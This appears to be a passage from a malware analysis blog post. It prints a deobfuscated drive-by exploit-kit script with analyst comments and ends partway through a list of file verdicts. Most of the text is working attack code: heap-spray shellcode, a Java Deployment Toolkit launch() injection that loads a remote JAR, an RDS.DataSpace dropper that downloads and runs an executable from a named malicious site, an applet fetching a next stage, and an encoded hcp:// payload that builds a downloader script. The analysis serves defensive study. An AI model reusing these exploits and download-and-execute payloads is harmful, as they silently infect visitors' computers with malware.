// scan navigator.plugins descriptions for "Adobe Acrobat" / "Adobe PDF".
// Only presence is tested — no version gate, unlike sample 4's pdf/pdf2 split.
function a61tq_(){

var O__zw_u = 0;

if (b_0_p_f(“msie”)){

try {

if (xGo_3__3(‘AcroPDF.PDF’) || xGo_3__3(‘PDF.PdfCtrl’)){

O__zw_u = 1;

}

}

catch (e){

}

}

else {

try {

for (GNQQdvp = 0; GNQQdvp < navigator.plugins.length; GNQQdvp ++ ){ // GNQQdvp is never declared: implicit global, reused by R__fEa()

if (navigator.plugins[GNQQdvp].description.indexOf(‘Adobe Acrobat’) > – 1 ||

navigator.plugins[GNQQdvp].description.indexOf(‘Adobe PDF’) > – 1){

O__zw_u = 1;

}

}

}

catch (e){

}

}

return O__zw_u;

}

// Appends an iframe loading mQRn_WTG (the .swf / .pdf exploit files selected
// at the bottom of the script). Unlike sample 4's addp() the frame is 200x200
// rather than zero-sized, so it would actually be visible on the page.
function dRbrXL(mQRn_WTG){

var NIOq_bS = document.createElement(‘iframe’);

NIOq_bS.setAttribute(‘src’, mQRn_WTG);

NIOq_bS.setAttribute(‘width’, 200);

NIOq_bS.setAttribute(‘height’, 200);

document.body.appendChild(NIOq_bS);

return ;

}

// Heap spray. Fills the browser heap with 0x1200 blocks of 0x8000 UTF-16 units
// (64 KiB) each, every block being 0x0808 padding followed by the shellcode, so
// that a corrupted pointer landing anywhere in the sprayed region (presumably
// around 0x08080808, given the padding value) executes the payload. Called
// immediately before the second .swf exploit iframe is added (see dispatch).
function R__fEa(){

var Og_hgt;

var H_wGTyd = unescape(‘%u0808%u0808’); // 4 bytes of 0x08: padding/sled, and by inference the address the spray is aimed at

// Shellcode, %u-escaped (two bytes per unit, little-endian). The first units
// decode to 60 9C 81 EC 00 02 00 00 E8 00 00 00 00 5D (pushad; pushfd;
// sub esp,0x200; call $+5; pop ebp — a GetPC prologue), then
// 64 8B 40 18 / 8B 40 30 / 8B 40 0C (TEB -> PEB -> Ldr), i.e. a loaded-module
// walk of the kind used to resolve APIs without imports (remaining logic not
// decoded here; the analyst's findings on what it downloads are given below).
var M___ey_ = unescape(”

%u9c60%uec81%u0200%u0000%u00e8%u0000%u5d00%uc581%u011a%u0000%uc031%u8b64%u1840%u408b%u8b30

%u0c40%u788d%u8b1c%u8b3f%u2077%ud231%u05eb%uc2c1%u3007%u66c2%u24ad%u75df%u81f5%ubcf2%u5367

%u756f%u8be4%u085f%u758d%ue800%u007e%u0000%ue789%u758d%ue814%u00c8%u0000%uff57%u0055%uc389

%u758d%ue80c%u0066%u0000%u758d%ue820%u00b2%u0000%uc031%uc983%uf2ff%u4fae%ue389%u758d%ue83a

%u00a0%u0000%uc031%u0738%u3d74%u5746%ubc8d%u0024%u0001%u8900%u5007%u6850%u0100%u0000%u5357

%uff50%u0c55%uc009%u1e75%u488d%u2954%u57cf%uaaf3%u578d%uc7bc%u4402%u0000%u5200%u5050%u206a

%u5050%u5050%uff57%u0455%ueb5f%u81b8%u00c4%u0002%u9d00%uc361%ueb56%ue808%u000a%u0000%u4689

%uadfc%uc009%uf375%uc35e%u5756%uc189%u438b%u8b3c%u037c%u0178%u8bdf%u2077%ude01%uad56%ud801

%ud231%uc2c1%u3207%u4010%u3880%u7500%u31f5%u75ca%u58ec%uc629%ueed1%u7703%u0f24%u44b7%ufe33

%ue0c1%u0302%u1c47%u048b%u0103%u5fd8%uc35e%u8a57%u4606%u0632%u75aa%u5ffa%u26c3%uac80%uc7c8

%u318a%u0046%u0000%u2900%ucc1b%u002f%u0000%ud500%u0780%u011e%u0102%u6a60%u0008%ue14c%u1c89

%u0400%u154a%u4e00%u000d%u0618%u0713%u4800%u1f5a%u5b44%u1611%u5b07%ufb2f%u0397%u050e%u5e4a

%u1818%u594f%u0c5b%u4317%u0f58%u8d32%u03e1%u050e%u5e4a%u1818%u594f%u0f5b%u4314%u0f58%u9f32

%u03f3%u050e%u5e4a%u1818%u594f%u0e5b%u4315%u0f58%ub132%u00b1″);

// Heap spray proper:

while (H_wGTyd.length <= 0x10000 / 2)H_wGTyd += H_wGTyd; // double the padding until it exceeds 0x8000 UTF-16 units (64 KiB)

H_wGTyd = H_wGTyd.substring(0, 0x10000 / 2 – M___ey_.length); // trim so padding + shellcode is exactly 0x8000 units per block

Og_hgt = new Array();

for (GNQQdvp = 0; GNQQdvp < 0x1200; GNQQdvp ++ ){ // 0x1200 = 4608 blocks * 64 KiB ~= 288 MiB of sprayed heap; GNQQdvp is an implicit global

Og_hgt[GNQQdvp] = H_wGTyd + M___ey_;

}

}

The converted shellcode from the hex bytes give us a Silvana malware (Downloader).

Notice how it specifies the length of the shellcode to run within the file.

A LorPE effected Silvana. The string is found in the section header.

clip_image008

clip_image010

The embedded shellcode results in the same executable.

This downloads from a malicious site-http://www.porno2top.tk/www/load.php?f=1&e=2

function G__Hg_F(){

try {

var d6_V_jT =

“http: -J-jar -J\\\\91.193.194.80\\public\\a729d76292a6a72fc99598bbc1e33ae6.mp4 none”;

The string is again a javaws command line for the Deployment Toolkit launch() injection, CVE-2010-0886 (the identifier above is truncated to "088"): "-J-jar -J\\91.193.194.80\public\a729d76292a6a72fc99598bbc1e33ae6.mp4" loads a JAR from a remote UNC share, the .mp4 extension being only a disguise. The rest of G__Hg_F() is the same IE (Deployment Toolkit CLSID, then Java Plug-in CLSID as fallback) versus non-IE (MIME-type-selected NPAPI plugin) selection seen in zazo() of sample 4.

if (b_0_p_f(“msie”)){

try {

var v7_J_qaW = document.createElement(‘OBJECT’);

v7_J_qaW.classid = ‘clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA’;

v7_J_qaW.launch(d6_V_jT);

}

catch (e){

var VPV5G_y = document.createElement(‘OBJECT’);

VPV5G_y.classid = ‘clsid:8AD9C840-044E-11D1-B3E9-00805F499D93’;

VPV5G_y.launch(d6_V_jT);

}

}

else {

var v7_J_qaW = document.createElement(‘OBJECT’);

var CG_SWfd = document.createElement(‘OBJECT’);

v7_J_qaW.type = ‘application/npruntime-scriptable-plugin;deploymenttoolkit’;

CG_SWfd.type = ‘application/java-deployment-toolkit’;

document.body.appendChild(v7_J_qaW);

document.body.appendChild(CG_SWfd);

try {

v7_J_qaW.launch(d6_V_jT);

}

catch (e){

CG_SWfd.launch(d6_V_jT);

}

}

}

catch (e){

}

}

// RDS.DataSpace dropper (same technique as sample 1), invoked only when the
// User-Agent contains "msie 6" (see the call site below). CLSID BD96C556-...
// is the control commonly identified as RDS.DataSpace (MS06-014); its
// CreateObject() yields XMLHTTP, Shell.Application and ADODB.Stream outside
// the normal zone restrictions. Obfuscation notes: members are accessed with
// bracket notation and 'responseBody' is hidden in a variable, so the usual
// dotted names never appear literally in the script.
function piI__lYm(){ // downloads load.php?f=1&e=4 to .//..//BAh_ci.exe and runs it

var y_Q2__EU = ‘.//..//BAh_ci.exe’; // relative path: resolves against the browser process's current directory, not a fixed drop location

var natf_w_ = ‘responseBody’; // property-name indirection

var CtHBMYs = document.createElement(‘object’);

CtHBMYs.setAttribute(‘id’, ‘CtHBMYs’);

CtHBMYs.setAttribute(‘classid’, ‘clsid:BD96C556-65A3-11D0-983A-00C04FC29E36’); // RDS.DataSpace

try {

var Fxqx_lk = CtHBMYs[‘CreateObject’](‘msxml2.xmlhttp’, “”); // downloader

var q_dDn_XI = CtHBMYs[‘CreateObject’](‘shell.application’, “”); // launcher

var bb_tQ5Ra = CtHBMYs[‘CreateObject’](‘adodb.stream’, “”); // file writer

try {

bb_tQ5Ra[‘type’] = 1; // adTypeBinary

Fxqx_lk[‘open’](‘GET’, ‘http://alltraff.tk/test/load.php?f=1&e=4&#8217;, false); // synchronous GET from this URL; the trailing &#8217; is a garbled closing quote from the blog rendering

Fxqx_lk[‘send’]();

bb_tQ5Ra[‘open’]();

bb_tQ5Ra[‘write’](Fxqx_lk[natf_w_]); // raw responseBody bytes

bb_tQ5Ra[‘savetofile’](y_Q2__EU, 2); // saves to the file name above; 2 = adSaveCreateOverWrite

bb_tQ5Ra[‘close’]();

}

catch (wvvEhmnS){ // download/save failure is ignored; the execute step below is still attempted

}

try {

q_dDn_XI[‘shellexecute’](y_Q2__EU); // and executes it

}

catch (wvvEhmnS){

}

}

catch (wvvEhmnS){ // CreateObject failed (control blocked or kill-bitted): silent

}

}

// Dispatch, part 1: the Java launch() injection is attempted unconditionally,
// the RDS.DataSpace dropper only on IE 6, and a Java applet is written into
// the page for any browser with Java enabled.
G__Hg_F(); // CVE-2010-0886 launch() injection, all browsers

if (b_0_p_f(“msie 6″)){ // only IE 6 gets the MS06-014 RDS.DataSpace dropper, presumably because the control is kill-bitted on newer/patched systems

piI__lYm();

}

// Applet stage: N_kGS_.class from the bundled JAR, told where to fetch the next
// stage via the 'url' param (load.php?f=1&e=8). The trailing &#8221; is a
// garbled closing quote from the blog rendering, not part of the script.
document.write(”

<applet width=’100%’ height=’100%’ code=’N_kGS_.class’ archive=’5dd3034653f56299b44a547f4a

cc3b73.jar’><param name=’url’ VALUE=’http://alltraff.tk/test/load.php?f=1&e=8′></applet>&#8221;

);

if (b_0_p_f(“windows nt 5”)){

if (b_0_p_f(“msie 7”) || b_0_p_f(“msie 8″)){

var NIOq_bS = document.createElement(‘iframe’);

NIOq_bS.src = ”

The iframe src that follows is the hcp:// Help Center URL validation exploit, CVE-2010-1885 (HCP, not "HPC"). It is only added when the User-Agent reports Windows NT 5.x (XP/2003) together with IE 7 or IE 8, presumably because those are the configurations on which helpctr.exe handles hcp:// links and the whitelist bypass works. The same traversal (..%5C..%5Csysinfomain.htm) and svr= script injection as in sample 4 are used; here the injected script is fully URL-encoded and builds a reversed/substituted VBScript at run time.

hcp://services/search?query=&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%

A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%

A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%

A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%

A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%

A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%

A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%

A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=

//the payload starts from here

 

%3Cscript+defer%3Eeval%28new+ActiveXObject%28%27

wscript.shell%27%29.Run%28unescape%28%27cmd%252A%252Fc%252Ataskkill%252A%252FF%252A%252FIM

%252Ahelpctr.exe%257Ccd%252A..%252F%2526echo%252AExecute%2528strReverse%2528Replace%2528Re

place%2528U%2529htap%2528cexe.lhs%257C2%252Chtap%252Aelifotevas.oda%257C%2529ydoBesnopser.

lmx%2528etirw.oda%257Cnepo.oda%257C1%2524epyt.oda%257C3%2524edom.oda%257Cdnes.lmx%257C0%25

2CY6%2524e%25261%2524f%253Fphp.daol%252Ftset%252Fkt.ffartlla%252F%252F%253AptthY%252CYTEGY

%252Anepo.lmx%257CYexe.%257E%252F%253AcY%252A%2524%252Ahtap%257C%2529Yllehs.tpircswY%2528t

cejbOetaerC%2524lhs%252AteS%257C%2529Ymaerts.bdodaY%2528tcejbOetaerC%2524oda%252AteS%257C%

2529Yptthlmx.tfosorcimY%2528tcejbOetaerC%2524lmx%252Ates%257Ctxen%252Aemuser%252Arorre%252

AnoU%252C%252AUYU%252C%252Achr%252834%2529%2529%252C%252AU%257CU%252C%252Avbcrlf%2529%2529

%2529%252A%253E%257E.vbs%257Cwscript%252A%257E.vbs%2526del%252A%252Fq%252A%257E.vbs%27%29.

replace%28%2F%5B%2A%5D%2Fg%2CString.fromCharCode%2832%29%29.replace%28%2F%5B%24%5D%2Fg%2CS

tring.fromCharCode%2861%29%29.replace%28%2FU%2Fg%2CString.fromCharCode%2834%29%29%29%29%3B

%3C%2Fscript%3E”;

document.body.appendChild(NIOq_bS);

}

}

// Dispatch, part 2: Flash and PDF exploit selection keyed on the exact Flash
// build and on Reader presence.
var F_P4j_ = hQwqbnZ(); // [major, minor, build] of Flash Player as digit strings

// Flash 9.0.16 / .28 / .45 / .47 / .64 / .115 exactly: first SWF exploit.
// Loose == is relied on because the elements are strings.
if (F_P4j_[0] == 9 && F_P4j_[1] == 0){

if (F_P4j_[2] == 16 || F_P4j_[2] == 28 || F_P4j_[2] == 45 || F_P4j_[2] == 47 || F_P4j_[2

] == 64 || F_P4j_[2] == 115){

dRbrXL(“e8934532b803bc7483722afc9fec1176.swf”);

}

}

// Any Adobe Reader/Acrobat plugin present: PDF exploit, with no version gate.
if (a61tq_()){

dRbrXL(“e21000adef033902673ed41e225fac49.pdf”);

}

// IE or Firefox only: a second, heap-spray-assisted SWF exploit for another
// list of Flash 9.0.x builds and for Flash 10.0.12 / .15 / .22.
if (b_0_p_f(“msie”) || b_0_p_f(“firefox”)){ // only IE and Firefox are targeted here

if (F_P4j_[0] == 9 || F_P4j_[0] == 10){

var q__zZC_h = 0;

if (F_P4j_[0] == 9 && F_P4j_[1] == 0){

if (F_P4j_[2] == 28 || F_P4j_[2] == 31 || F_P4j_[2] == 45 || F_P4j_[2] == 47 ||

F_P4j_[2] == 48 || F_P4j_[2] == 115 || F_P4j_[2] == 124 || F_P4j_[2] == 151 ||

F_P4j_[2] == 152 || F_P4j_[2] == 159){

q__zZC_h = 1;

}

}

if (F_P4j_[0] == 10 && F_P4j_[1] == 0){

if (F_P4j_[2] == 12 || F_P4j_[2] == 15 || F_P4j_[2] == 22){

q__zZC_h = 1;

}

}

if (q__zZC_h == 1){

R__fEa(); // spray the heap first so the SWF's corrupted pointer lands on the shellcode (inferred from the ordering)

dRbrXL(“34b8f13e77984874cb6d17bc999ac790.swf”);

}

}}

RESULT:MALICIOUS

6] ta.php

 

Non-malicious.

 

 

7] id1(1)

 

Non-malicious.

8] pBoot.txt

Non-Malicious:

9] id1.txt

Non-Malicious.

10] god.txt
